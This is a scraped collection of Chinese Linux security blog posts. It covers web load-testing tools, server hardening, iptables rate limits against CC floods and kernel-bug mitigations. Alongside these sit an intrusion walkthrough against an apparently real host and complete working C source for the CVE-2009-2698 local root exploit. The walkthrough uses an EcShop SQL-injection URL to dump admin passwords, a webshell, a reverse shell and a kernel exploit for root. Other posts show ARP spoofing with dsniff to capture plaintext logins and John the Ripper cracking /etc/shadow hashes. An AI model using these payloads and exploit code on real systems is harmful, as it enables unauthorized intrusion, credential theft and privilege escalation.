http_load以并行复用的方式运行，用以测试web服务器的吞吐量与负载。但是它不同于大多数压力测试工具，它可以以一个单

一的进程运行，一般不会把客户机搞死。还可以测试HTTPS类的网站请求。
#wget http://www.acme.com/software/http_load/http_load-12mar2006.tar.gz
#tar zxvf http_load-12mar2006.tar.gz
#cd http_load-12mar2006
#make && make install
#http_load -p并发访问进程数 -f总计的访问次数 -r每秒的访问频率 -s访问时间  需要访问的url文件
#echo "http://192.168.1.101/test.php" >1.txt
#http_load -p 30 -s 60 1.txt
7751 fetches, 30 max parallel, 2.9119e+08 bytes, in 60.0024 seconds
37568 mean bytes/connection
129.178 fetches/sec, 4.85297e+06 bytes/sec
msecs/connect: 77.8017 mean, 3050.89 max, 30.308 min
msecs/first-response: 50.3716 mean, 9148.3 max, 31.205 min
HTTP response codes:code 200 -- 7751                说明打开响应页面的类型

http://www.acme.com/software这个网站上有很多小工具:http_ping、http_get、http_post

还有一个secure HTTP server:thttpd

二、webbench

#wget http://blog.s135.com/soft/linux/webbench/webbench-1.5.tar.gz
#tar zvxf webbench-1.5.tar.gz
#cd webbench-1.5
#make && make install
webbench -c 并发数 -t 运行测试时间 url
#webbench -c 5000 -t 30 http://192.168.1.101/test.php

三、ab

ab是apache自带的一款功能强大的测试工具,一般安装apache就默认安装的
#/usr/local/apache/bin/ab -c 100 -n 100 http://192.168.1.101/test.php
-c -n 是常用的两个
This is ApacheBench, Version 2.3 <$Revision: 655654 mce_markergt;
Copyright 1996 Adam Twiss, Zeus Technology Ltd, http://www.zeustech.net/
Licensed to The Apache Software Foundation, http://www.apache.org/

Benchmarking 192.168.1.101 (be patient).....done

Server Software:        Apache/2.2.3
Server Hostname:        192.168.8.201
Server Port:            80

Document Path:          /1.php
Document Length:        37752 bytes

Concurrency Level:      100
Time taken for tests:   0.908 seconds
Complete requests:      100
Failed requests:        0
Write errors:           0
Total transferred:      3923458 bytes
HTML transferred:       3905226 bytes
Requests per second:    110.11 [#/sec] (mean)
Time per request:       908.165 [ms] (mean)
Time per request:       9.082 [ms] (mean, across all concurrent requests)
Transfer rate:          4218.95 [Kbytes/sec] received

Connection Times (ms)
min  mean[+/-sd] median   max
Connect:       34   34   1.8     34      42
Processing:   109  519 246.1    474     868
Waiting:       35   78  61.8     56     285
Total:        151  553 245.5    508     901

Percentage of the requests served within a certain time (ms)
50%    508
66%    797
75%    814
80%    840
90%    883
95%    883
98%    901
99%    901
100%    901 (longest request)

四、Siege

一款开源的压力测试工具，可以根据配置对一个WEB站点进行多用户的并发访问，记录每个用户所有请求过程的相应时间，并在一定数量的并发访问下重复进行。
#wget ftp://ftp.joedog.org/pub/siege/siege-latest.tar.gz
#tar zvxf siege-latest.tar.gz
#cd siege-latest
#./configure && make && make install
#siege -c 100 -r 100 http://192.168.1.101/test.php
Transactions:                  10000 hits  1w点击率
Availability:                 100.00 %     成功率
Elapsed time:                  90.29 secs  总共用时
Data transferred:             365.56 MB    总共数据的传输
Response time:                  0.21 secs  显示网络连接的速度
Transaction rate:             110.75 trans/sec每秒完成处理次数
Throughput:                     4.05 MB/sec 平均每秒传送数据
Concurrency:                   23.61        最高并发量
Successful transactions:       10000        成功次数
Failed transactions:               0        失败次数
Longest transaction:           14.70        每次传输所花最长时间
Shortest transaction:           0.12        每次传输所花最短时间

相关文章

• 再分享一个aspx的ddos脚本
• 分享国外一个PHP DDOS的脚本
• Linux下渗透嗅探术
• Linux网络安全经验之谈
• 应对服务器被DDOS攻击的紧急措施
• 用iptables来防止web服务器被CC攻击
• Redhat Linux环境下编译安装John
• Join破解Linux密码
• Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit
• Magic Linux 2.5 Beta 2 放出

在寻找突破时，更多的是从应用服务来，而应用服务最直观的信息采集，就是端口扫描，不同的应用，开放的服务不一样。所以，在对网络进行信息收集时， 大概分为这样两步： 端口探测，程序指纹分析。在端口探测方面，个人喜欢用SuperScan来快速对网段里的应用进行判断，如图：

在掌握端口信息后，就要对服务应用程序的指纹进行分析，主要包括版本号、已知的漏洞信息、常规配置信息、针对此应用流行的攻击方法等。本文试着对网内一台提供WEB服务的主机作为突破口，提交一个畸形的请求，如图：

从上图可以读取以下信息：
系统类型：Fedora
应用程序：apache/2.2.4
以上只是很简单的手工对程序指纹进行分析，当然在针对web应用的扫描器，还有很多，比较常用的wvs、appscan等。用轻量级的”wwwwscan”来扫描：

由扫描的结果可以看到，与手工探测的结果是一致的。

通上面简单的信息收集后，可以了解到网站架构是apache+mysql+php,直接请求URL：http://61.67.xx.116/htdocs/

发现此站是EcShop架构的站点，其使用的版本信息是V2.5.0。EcShop的版本是存在许多的注入点的。其中user.php文件有个注入漏洞，直接请求URL如下：
http://61.67.xx.116/htdocs/user.php?act=order_query&order_sn=’ union select 1,2,3,4,5,6,concat(user_name,0×7c,password,0×7c,email),8 from ecs_admin_user/*

获取管理员帐号和密码，ECShop使用的是MD5加密，直接解密。原来密码是admin，有点意料之外。访问管理后台，修改模版处，插入一句木马，即可得到WEBSEHLL，如图：

在获取WEBshell权限后，就需要对系统进行分析，查找Exp了。执行命令如下：
#uname –a

返回的信息是“Linux fedora 2.6.20-1.2962.fc6 ”，Linux内核是2.6.20的。
在提权时，要用到gcc进行编译，刺探一下系统有没有安装，执行命令，
#gcc –help

发现可以运行gcc,并且系统管理员没对使用shell和gcc进行限制，在也是个安全缺失。

在寻找本地提权利用程序时，通常是根据系统版本来进行，应用程序的本地提权也是一样的。在网上就有可供查询的网站，比如http://www.milw0rm.com/网站如图：

发现可利用的漏洞还真不少。

本地提权是需要个交互式的shell的。在本机监听端口如下：

利用WebShell自带的反弹功能直接连接本地的12345端口并返回shell如图：

连接成功后，就能得到一个apache用户的shell
，但有时如果不能交互时，可以直接执行，
# python –c ‘impotr pty;pty.spawn(“/bin/sh”);’
来得到交互的Shell,一般的系统都默认安装python
如图：

提示成功了，可以新建个目录用来存放提权的工具。

在Linux提权大致可分为，第三方软件漏洞、本地信任特性、内核溢出等，比较常用的溢出率高的，当属内核了。用Wget下载溢出源码，用到的漏洞是Linux vmsplice Local Root Exploit
，成功率蛮高的，gcc编译，执行，如图：

成功获取root权限，在选择溢出利用程序时，有时需要进行多次测试。

什么是Sniffer，sniffer是利用截获目的的计算机通信，通过分析截获的数据，提取敏感信息的工具。但其通过什么方法来截获数据呢？在此 之前得解释一下arp（Address Rrsolution Protocol）协议,即地址解析协议，它位于TCP/IP协议栈中的低层协议，负责将某个IP地址解析成对应的MAC地址。它靠维持在内存中保存的一 张表来使IP得以在网络上被目标机器应答。在数据传送时，IP包里就有源IP地址、源MAC地址、目标IP地址，如果在ARP表中有相对应的MAC地点， 那么根据最优选择法，直接访问，如果，没有对应的地址，就要广播出去，在网内寻找对应的地址，如果对方的IP地址和发出的目标IP地址相同，那么对方会发 送MAC地址给源主机，，而此时，如果攻击者也接听到发送的IP地址，它就会仿冒目标主机的IP地址，然后返回自己的主机的MAC地址给源主机，因为源主 机发送的IP包没有包括目标主机的MAC地址，而ARP表里面又没有目标IP和目标MAC地址的对应表，就会接受攻击者的MAC而选择与其通信，所以就此 产生了ARP欺骗。在系统刚启动时，可以在DOS下输入命令“arp -a”来查看本机arp缓存表的内容，如图：

我们来与IP192.168.0.5进行通信，通信后arp缓存表就会有这样一条MAC地址和IP对应的记录。如图：

在本机多了条缓存中的IP和MAC的对应纪录。

Dsniff是一个著名的网络嗅探工具包，其开发者是Dug Song，其开发的本意是用来揭示网络通信的不安全性，方便网络管理员对自己网络的审计，当然也包括渗透测试，其安装包里某此工具，充分揭示了协议的不安 全性。作为一个工具集，Dsniff包括的工具大致分为四类：
一、 纯粹被动地进行网络活动监视的工具，包括：dsniff、filesnarf、mailsnaf、msgsnarf、urlsnarf、webspy
二、 针对SSH和SSL的MITM“攻击”工具，包括sshmitm和webmitm
三、 发起主动欺骗的工具，包括：arpspoof、dnsspof、macof
四、 其它工具，包括tcpkill、tcpnice

Dsniff的官方下载：www.monkey.org/~dugsong/dsniff/ 这个是源码包，解压后可以看下README,提示需要五个软件的支持：openssl、Berkeley_db、libnet、libpca、libnids
下载地址如下：
Berkeley_db: http://www.oracle.com/technology/software/products/berkeley-db/index.html
libpcap: http://www.tcpdump.org/release/libpcap-1.0.0.tar.gz
ftp://rpmfind.net/linux/epel/5/i386/dsniff-2.4-0.3.b1.el5.i386.rpm
ftp://rpmfind.net/linux/epel/5/i386/libnet-1.1.4-1.el5.i386.rpm
ftp://rpmfind.net/linux/epel/5/i386/libnids-1.23-1.el5.i386.rpm
系统一般默认都有安装openssl、libpcap。

一、	Tar包安装
如果下载的是源包，文件如下：openssl-0.9.7i.tar.gz、libnids-1.18.tar.gz、libpcap-0.7.2.tar.gz、libnet-1.0.2a.tar.gz、Berkeley db-4.7.25.tar.gz
a)	安装openssl
用tar解压软件包手，执行三条命令
#./config
#make
#make install
b)	安装libpcap
#./config
#make
#make install
c)	安装libnet
#./config
#make
#make install
d)	安装libnids
#./config
#make
#make install
e)	安装libnids
#./config
#make
#make install
f)	安装Berkeley DB
#.cd build_unix
#../dist/configure
#make
#make install
g)	安装dsniff
#./configure
#make
#make install
程序安装好后，先查看一下网卡信息，然后开启服务器IP转发，命令如下：
# echo "1" > /proc/sys/net/ipv4/ip_forward

先来双向欺骗，用到arpspoof，其命令是：
#arp –t 网关 欺骗主机IP
如图：

arpspoof已经开始工作了，可以用tcpdump查看一下被攻击主机是否有数据经过
命令如下：
#tcpdump –I eth0 host 61.67.x.115
如图：

有数据交换，说明欺骗的比较成功，然后用Dsniff开始嗅探目标主机，命令如下：
#Dsniff –c –f /etc/dsniff/dsniff.services
这个dsniff.services自然就是保存端口和服务对应关系的文件，如需要保存到文件，需加-w filename数据全是明文传送的。所以数据分析完全能用肉眼发现，如图：

从这条数据可以看到HTTP登录和FTP登录信息，帐号和密码全是明文的。而经过测试，通过FTP上传的目录正是WEB目录，获取WEBShell 权限，继续提权即可控制主机。Linux下的嗅探，其实更容易一些，在最近爆出的高危本地提权，不知道有多少台主机沦陷呢？在攻与防的游戏里，系统管理员 往往显得如此的无助。

相关文章

• Linux下压力测试综合对比
• Linux网络安全经验之谈
• 用iptables来防止web服务器被CC攻击
• Redhat Linux环境下编译安装John
• Join破解Linux密码
• Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit
• Magic Linux 2.5 Beta 2 放出
• Slackware Linux 13.0 正式发布
• 一个命令可以攻击所有Linux系统
• 来自雨林木风的Linux发行版: Ylmf Linux

一个潜在的黑客如果要攻击你的Linux服务器，他首先就会尝试缓冲区溢出。在过去的几年中，以缓冲区溢出为类型的安全漏洞是最为常见的一种形式了。更为严重的是，缓冲区溢出漏洞占了远程网络攻击的绝大多数，这种攻击可以轻易使得一个匿名的Internet用户有机会获得一台主机的部分或全部的控制权！

为了防止此类攻击，我们从安装系统时就应该注意。如果用root分区纪录数据，如log文件和email，就可能因为拒绝服务产生大量日志或垃 圾邮件，从而导致系统崩溃。所以建议为/var开辟单独的分区，用来存放日志和邮件，以避免root分区被溢出。最好为特殊的应用程序单独开一个分区，特 别是可以产生大量日志的程序，还有建议为/home单独分一个区，这样他们就不能填满/分区了，从而就避免了部分针对Linux分区溢出的恶意攻击。

关于BIOS

记着要在BIOS设置中设定一个BIOS密码，不接收软盘启动。这样可以阻止不怀好意的人用专门的启动盘启动你的Linux系统，并避免别人更改BIOS设置，如更改软盘启动设置或不弹出密码框直接启动服务器等等。

关于口令

口令是系统中认证用户的主要手段，系统安装时默认的口令最小长度通常为5，但为保证口令不易被猜测攻击，可增加口令的最小长度，至少等于8。为 此，需修改文件/etc/login.defs中参数PASS_MIN_LEN（口令最小长度）。同时应限制口令使用时间，保证定期更换口令，建议修改参 数PASS_MIN_DAYS（口令使用时间）。

关于Ping

既然没有人能ping通你的机器并收到响应，你可以大大增强你的站点的安全性。你可以加下面的一行命令到/etc/rc.d/rc.local，以使每次启动后自动运行，这样就可以阻止你的系统响应任何从外部/内部来的ping请求。

echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all

关于Telnet

如果你希望用户用Telnet远程登录到你的服务器时不要显示操作系统和版本信息（可以避免有针对性的漏洞攻击），你应该改写/etc/inetd.conf中的一行象下面这样：

telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd -h

加-h标志在最后使得telnet后台不要显示系统信息，而仅仅显示login。

关于特权账号

禁止所有默认的被操作系统本身启动的且不需要的帐号，当你第一次装上系统时就应该做此检查，Linux提供了各种帐号，你可能不需要，如果你不需要这个帐号，就移走它，你有的帐号越多，就越容易受到攻击。

为删除你系统上的用户，用下面的命令：userdel username

为删除你系统上的组用户帐号，用下面的命令：groupdel username

在终端上打入下面的命令删掉下面的特权用账号：

userdel adm

userdel lp

userdel sync

userdel shutdown

userdel halt

userdel mail

如果你不用sendmail服务器，就删除这几个帐号：

userdel news

userdel uucp

userdel operator

userdel games

如果你不用X windows 服务器，就删掉这个帐号。

userdel gopher

如果你不允许匿名FTP，就删掉这个用户帐号：

userdel ftp

关于su命令

如果你不想任何人能够su为root的话,你应该编辑/etc/pam.d/su文件，加下面几行：

auth sufficient /lib-

/security/pam_rootok-

.so debug

auth required /lib-

/security/pam_wheel-

.so group=isd

这意味着仅仅isd组的用户可以su作为root。如果你希望用户admin能su作为root.就运行下面的命令：

usermod -G10 admin

suid程序也是非常危险的，这些程序被普通用户以euid=0（即root）的身份执行，只能有少量程序被设置为suid。用这个命令列出系统的suid二进制程序：

suneagle# find / -perm -4000 -print

你可以用chmod -s去掉一些不需要程序的suid位。

关于账户注销

如果系统管理员在离开系统时忘了从root注销，系统应该能够自动从shell中注销。那么，你就需要设置一个特殊的 Linux 变量“tmout”，用以设定时间。 同样，如果用户离开机器时忘记了注销账户，则可能给系统安全带来隐患。你可以修改/etc/profile文件，保证账户在一段时间没有操作后，自动从系 统注销。 编辑文件/etc/profile，在“histfilesize=”行的下一行增加如下一行:

tmout=600

则所有用户将在10分钟无操作后自动注销。注意：修改了该参数后，必须退出并重新登录root，更改才能生效。

关于系统文件

对于系统中的某些关键性文件如passwd、passwd.old、passwd._、shadow、shadown._、 inetd.conf、services和lilo.conf等可修改其属性，防止意外修改和被普通用户查看。 如将inetd文件属性改为600：

# chmod 600 /etc/inetd.conf

这样就保证文件的属主为root，然后还可以将其设置为不能改变:

# chattr +i /etc/inetd.conf

这样，对该文件的任何改变都将被禁止。 你可能要问：那我自己不是也不能修改了？当然，我们可以设置成只有root重新设置复位标志后才能进行修改:

# chattr -i /etc/inetd.conf

关于用户资源

对你的系统上所有的用户设置资源限制可以防止DoS类型攻击，如最大进程数，内存数量等。例如，对所有用户的限制， 编辑/etc/security/limits.con加入以下几行：

* hard core 0

* hard rss 5000

* hard nproc 20

你也必须编辑/etc/pam.d/login文件，检查这一行的存在：

session required /lib/security/pam_limits.so

上面的命令禁止core files“core 0”，限制进程数为“nproc 50“，且限制内存使用为5M“rss 5000”。

关于NFS服务器

由于NFS服务器漏洞比较多，你一定要小心。如果要使用NFS网络文件系统服务，那么确保你的/etc/exports具有最严格的存取权限设 置，不意味着不要使用任何通配符，不允许root写权限，mount成只读文件系统。你可以编辑文件/etc/exports并且加：

/dir/to/export host1.mydomain.com(ro,root_squash)

/dir/to/export host2.mydomain.com(ro,root_squash)

其中/dir/to/export 是你想输出的目录，host.mydomain.com是登录这个目录的机器名，ro意味着mount成只读系统，root_squash禁止root写 入该目录。最后为了让上面的改变生效，还要运行/usr/sbin/exportfs -a

关于开启的服务

默认的linux就是一个强大的系统，运行了很多的服务。但有许多服务是不需要的，很容易引起安全风险。这个文件就是/etc /inetd.conf，它制定了/usr/sbin/inetd将要监听的服务，你可能只需要其中的两个：telnet和ftp，其它的类如 shell, login, exec, talk, ntalk, imap, pop-2, pop-3, finger, auth, etc. 除非你真的想用它。否则统统关闭之。

你先用下面的命令显示没有被注释掉的服务：

grep -v "#" /etc/inetd.conf

这个命令统计面前服务的总数：

ps -eaf|wc -l

需要提醒你的是以下三个服务漏洞很多，强烈建议你关闭它们：S34yppasswdd（NIS服务器）、S35ypserv（NIS服务器）和S60nfs（NFS服务器）。

我们可以运行#killall -HUP inetd来关闭不需要的服务。当然，你也可以运行

#chattr +i /etc/inetd.conf

如果你想使inetd.conf文件具有不可更改属性，而只有root 才能解开，敲以下命令

#chattr -i /etc/inetd.conf

当你关闭一些服务以后，重新运行以上命令看看少了多少服务。运行的服务越少，系统自然越安全了。我们可以用下面命令察看哪些服务在运行：

netstat -na --ip

如果你用的是Redhat那就方便多了。^_^ Redhat提供一个工具来帮助你关闭服务，输入/usr/sbin/setup，然后选择"system services"，就可以定制系统启动时跑哪些服务。另外一个选择是chkconfig命令，很多linux版本的系统都自带这个工具。脚本名字中的数 字是启动的顺序，以大写的K开头的是杀死进程用的。

关于日志

所有的日志都在/var/log下（仅对linux系统而言），默认情况下linux的日志就已经很强大了，但除ftp外。因此我们可以通过修 改/etc/ftpaccess 或者/etc/inetd.conf，来保证每一个ftp连接日志都能够纪录下来。下面是一个修改inetd.conf的例子，假如有下一行：

ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -L -i -o

注释：

-l每一个ftp连接都写到syslog

-L纪录用户的每一个命令

-i文件received,纪录到xferlog

-o文件transmitted,记录到xferlog

不过你也不要太相信日志，因为绝大部分黑客都有“擦脚印”的“好”习惯啰！如果你不放心，最好安装一个Sniffer吧。

关于TCP_WRAPPERS

默认的，Redhat Linux允许所有的请求，这是很危险的。如果用TCP_WRAPPERS来增强我们站点的安全性简直是举手之劳，你可以将禁止所有的请求放入“ALL: ALL”到/etc/hosts.deny中，然后放那些明确允许的请求到/etc/hosts.allow中，如:

sshd: 192.168.1.10/255.255.255.0 gate.openarch.com

对IP地址192.168.1.10和主机名gate.openarch.com，允许通过ssh连接。配置完了之后，用tcpdchk检查， 你可以直接执行：tcpdchk 。在这里，tcpchk是TCP_Wrapper配置检查工具，它检查你的tcp wrapper配置并报告所有发现的潜在/存在的问题。

关于补丁

你应该经常到你所安装的Linux系统发行商的主页上去找最新的补丁。例如：对于Redhat系统而言可以 在：http://www.redhat.com/corp/support/errata/上找到补丁。幸运的是，在Redhat6.1以后的版本带有 一个自动升级工具up2date，它能自动够测定哪些rpm包需要升级，然后自动从Redhat的站点下载并完成安装。这对某些懒惰的管理员来说，可是个 省精神的福音哦！^_^

相关文章

• Linux下压力测试综合对比
• Linux下渗透嗅探术
• 用iptables来防止web服务器被CC攻击
• Redhat Linux环境下编译安装John
• Join破解Linux密码
• Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit
• Magic Linux 2.5 Beta 2 放出
• Slackware Linux 13.0 正式发布
• 一个命令可以攻击所有Linux系统
• 来自雨林木风的Linux发行版: Ylmf Linux

1．系统要求

(1)LINUX 内核版本：2.6.9-42ELsmp或2.6.9-55ELsmp（其它内核版本需要重新编译内核，比较麻烦，但是也是可以实现的）。

(2)iptables版本：1.3.7

2. 安装

安装iptables1.3.7和系统内核版本对应的内核模块kernel-smp-modules-connlimit

3. 配置相应的iptables规则

示例如下：

(1)控制单个IP的最大并发连接数

iptables -I INPUT -p tcp –dport 80 -m connlimit \
–connlimit-above 50 -j REJECT
#允许单个IP的最大连接数为 30

(2)控制单个IP在一定的时间（比如60秒）内允许新建立的连接数

iptables -A INPUT -p tcp –dport 80 -m recent \
–name BAD_HTTP_ACCESS –update –seconds 60 \
–hitcount 30 -j REJECT
iptables -A INPUT -p tcp –dport 80 -m recent \
–name BAD_HTTP_ACCESS –set -j ACCEPT
#单个IP在60秒内只允许最多新建30个连接

4. 验证

（1）工具：flood_connect.c（用来模拟攻击)

（2）查看效果：

使用
watch ‘netstat -an | grep:21 | \ grep< 模拟攻击客户机的IP>| wc -l’

实时查看模拟攻击客户机建立起来的连接数，

使用
watch ‘iptables -L -n -v | \grep< 模拟攻击客户机的IP>’

查看模拟攻击客户机被 DROP 的数据包数。

5．注意

为了增强iptables防止CC攻击的能力，最好调整一下ipt_recent的参数如下：

#cat/etc/modprobe.conf
options ipt_recent ip_list_tot=1000 ip_pkt_list_tot=60
#记录1000个IP地址，每个地址记录60个数据包
#modprobe ipt_recent

from:http://tech.ccidnet.com/art/1099/20080429/1434761_1.html

相关文章

• Linux下压力测试综合对比
• Linux下渗透嗅探术
• Linux网络安全经验之谈
• Redhat Linux环境下编译安装John
• Join破解Linux密码
• Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit
• Magic Linux 2.5 Beta 2 放出
• Slackware Linux 13.0 正式发布
• 一个命令可以攻击所有Linux系统
• 来自雨林木风的Linux发行版: Ylmf Linux

安装GCC编译环境：

[root@localhost run]# yum install gcc

到http://www.openwall.com/john/下载适合自己的编译包，我选择的是稳定版：

[root@localhost run]# wget http://www.openwall.com/john/f/john-1.7.0.2.tar.gz

[root@localhost run]# tar -zxf john-1.7.0.2.tar.gz

[root@localhost run]# cd john-1.7.0.2/src

编译安装

[root@localhost run]# make

选择自己的操作系统类型编译

[root@localhost run]# make clean linux-x86-mmx

如果没有发现适合自己的操作系统请用：

[root@localhost run]# make clean generic

测试：

[root@localhost run]# cd ../run

[root@localhost run]# ./john –test

相关文章

• Linux下压力测试综合对比
• Linux下渗透嗅探术
• Linux网络安全经验之谈
• 用iptables来防止web服务器被CC攻击
• Join破解Linux密码
• Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit
• Magic Linux 2.5 Beta 2 放出
• Slackware Linux 13.0 正式发布
• 一个命令可以攻击所有Linux系统
• 来自雨林木风的Linux发行版: Ylmf Linux

测试环境，RHEL5系统，系统root帐户一个，自建帐户icnpunk一个。

[root@localhost run]# ./unshadow /etc/passwd /etc/shadow > /tmp/passwd

[root@localhost run]# vim /tmp/passwd
删除没有用的行，只剩下需要破解的账号：

root:$1$aUXH7Z3Y$fec8RLXoAkEdn41UmvMYj.:0:0:root:/root:/bin/bash
icnpunk:$1$CmzD3ab0$qp.JmpXa8d3IIBYrltWDb/:500:500::/home/icnpunk:/bin/bash

我加入了自己的真实密码到password.lst文件里

[root@localhost run]# echo 1234567 >> password.lst

[root@localhost run]# ./john –wordlist=password.lst /tmp/passwd
Loaded 2 password hashes with 2 different salts (FreeBSD MD5 [32/32])
1234567          (root)
1234567          (icnpunk)
guesses: 2  time: 0:00:00:01 100%  c/s: 5920  trying: 1234567

相关文章

• Linux下压力测试综合对比
• Linux下渗透嗅探术
• Linux网络安全经验之谈
• 用iptables来防止web服务器被CC攻击
• Redhat Linux环境下编译安装John
• Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit
• Magic Linux 2.5 Beta 2 放出
• Slackware Linux 13.0 正式发布
• 一个命令可以攻击所有Linux系统
• 来自雨林木风的Linux发行版: Ylmf Linux

/*
**
** 0x82-CVE-2009-2698
** Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit
**
** Tested White Box 4(2.6.9-5.ELsmp),
** CentOS 4.4(2.6.9-42.ELsmp), CentOS 4.5(2.6.9-55.ELsmp),
** Fedora Core 4(2.6.11-1.1369_FC4smp), Fedora Core 5(2.6.15-1.2054_FC5),
** Fedora Core 6(2.6.18-1.2798.fc6).
**
** --
** Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team.
** Thankful to them.
**
** --
** bash$ gcc -o 0x82-CVE-2009-2698 0x82-CVE-2009-2698.c && ./0x82-CVE-2009-2698
** sh-3.1# id
** uid=0(root) gid=0(root) groups=500(x82) context=user_u:system_r:unconfined_t
** sh-3.1#
** --
** exploit by
.
**
*/

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <sys/personality.h>

unsigned int uid, gid;
void get_root_uid(unsigned *task)
{
	unsigned *addr=task;
	while(addr[0]!=uid||addr[1]!=uid||addr[2]!=uid||addr[3]!=uid){
		addr++;
	}
	addr[0]=addr[1]=addr[2]=addr[3]=0; /* set uids */
	addr[4]=addr[5]=addr[6]=addr[7]=0; /* set gids */
	return;
}
void exploit();
void kernel_code()
{
	asm("exploit:\n"
		"push %eax\n"
		"movl $0xfffff000,%eax\n"
		"andl %esp,%eax\n"
		"pushl (%eax)\n"
		"call get_root_uid\n"
		"addl $4,%esp\n"
		"popl %eax\n");
	return;
}
void *kernel=kernel_code;

int main(int argc, char **argv)
{
	int fd=0;
	char buf[1024];
	struct sockaddr x0x;
	void *zero_page;

	uid=getuid();
	gid=getgid();
	if(uid==0){
		fprintf(stderr,"[-] check ur uid\n");
		return -1;
	}
	if(personality(0xffffffff)==PER_SVR4){
		if(mprotect(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)==-1){
			perror("[-] mprotect()");
			return -1;
		}
	}
	else if((zero_page=mmap(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,0,0))==MAP_FAILED){
			perror("[-] mmap()");
			return -1;
	}
	*(unsigned long *)0x0=0x90909090;
	*(char *)0x00000004=0x90; /* +1 */
	*(char *)0x00000005=0xff;
	*(char *)0x00000006=0x25;
	*(unsigned long *)0x00000007=(unsigned long)&kernel;
	*(char *)0x0000000b=0xc3;

	if((fd=socket(PF_INET,SOCK_DGRAM,0))==-1){
		perror("[-] socket()");
		return -1;
	}
	x0x.sa_family=AF_UNSPEC;
	memset(x0x.sa_data,0x82,14);
	memset((char *)buf,0,sizeof(buf));
	sendto(fd,buf,1024,MSG_PROXY|MSG_MORE,&x0x,sizeof(x0x));
	sendto(fd,buf,1024,0,&x0x,sizeof(x0x));
	if(getuid()==uid){
		printf("[-] exploit failed, try again\n");
		return -1;
	}
	close(fd);
	execl("/bin/sh","sh","-i",NULL);
	return 0;
}

/* eoc */

相关文章

• Linux Kernel 2.6.x ptrace_attach Local Privilege Escalation Exploit
• Linux Kernel < 2.6.22 ftruncate()/open() Local Exploit
• Linux下压力测试综合对比
• PhpCms 2008 Sp3 Blind SQL Injection Exploit(2)
• PhpCms 2008 Sp3 Blind SQL Injection Exploit(1)
• Remote Exploit Against the Aircrack-NG Tools svn r1675
• discuz!7.1、7.2远程代码执行漏洞exploit
• Linux下渗透嗅探术
• Linux网络安全经验之谈
• Gnuboard 0day&Exp

• CD: MagicLinux-2.5.beta2-1.iso
• DVD: MagicLinux-2.5.beta2.k4-1.iso
• KDE 3 (CD): MagicLinux-2.5.beta2.k3-1.iso

相关文章

• Linux下压力测试综合对比
• Linux下渗透嗅探术
• Linux网络安全经验之谈
• 用iptables来防止web服务器被CC攻击
• Redhat Linux环境下编译安装John
• Join破解Linux密码
• Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit
• Slackware Linux 13.0 正式发布
• 一个命令可以攻击所有Linux系统
• 来自雨林木风的Linux发行版: Ylmf Linux

• 完全重制了 X 包集
• 对桌面环境进行了升级，含 KDE 4.2.4 和 Xfce 4.6.1
• 新的具有更好压缩功能的 .txz 包格式
• 对开发系统、网络服务、库、以及应用程序进行了升级

参阅发布公告和发行注记可以了解更详细的信息。Slackware Linux 13.0 的 ISO 映像可从这里下载（64 位）。

相关文章

• Linux下压力测试综合对比
• Linux下渗透嗅探术
• Linux网络安全经验之谈
• 用iptables来防止web服务器被CC攻击
• Redhat Linux环境下编译安装John
• Join破解Linux密码
• Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit
• Magic Linux 2.5 Beta 2 放出
• 一个命令可以攻击所有Linux系统
• 来自雨林木风的Linux发行版: Ylmf Linux

如上图所示，利用此漏洞极其简单，并且影响所有的Linux内核，baoz强烈建议系统管理员或安全人员参考下列临时修复方案，以防止Linux系统被攻击 。

1、使用Grsecurity或者Pax内核安全补丁，并开启KERNEXEC防护功能。

2、升级到2.6.31-rc6或2.4.37.5以上的内核版本。

3、如果您使用的是RedHa tEnterprise Linux 4/5的系统或Centos4/5的系统，您可以通过下面的操作简单的操作防止被攻击。

在/etc/modprobe.conf文件中加入下列内容：

install pppox /bin/true
install bluetooth /bin/true
install appletalk /bin/true
install ipx /bin/true
install sctp /bin/true

很明显，第三个方案最简单也相对有效，对业务影响也最小，如果您对编译和安装Linux内核不熟悉，千万不要使用前两个方案，否则您的系统可能永远无法启动。

Linux在微软的月经日爆如此严重的漏洞，挺值得纪念的。如果您希望了解本漏洞更多的内幕、八卦和细节，请访问http://baoz.net/linux-sockops-wrap-proto-ops-local-root-exploit/ 。

相关文章

• Linux下压力测试综合对比
• Linux下渗透嗅探术
• Linux网络安全经验之谈
• 用iptables来防止web服务器被CC攻击
• Redhat Linux环境下编译安装John
• Join破解Linux密码
• Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit
• Magic Linux 2.5 Beta 2 放出
• Slackware Linux 13.0 正式发布
• 来自雨林木风的Linux发行版: Ylmf Linux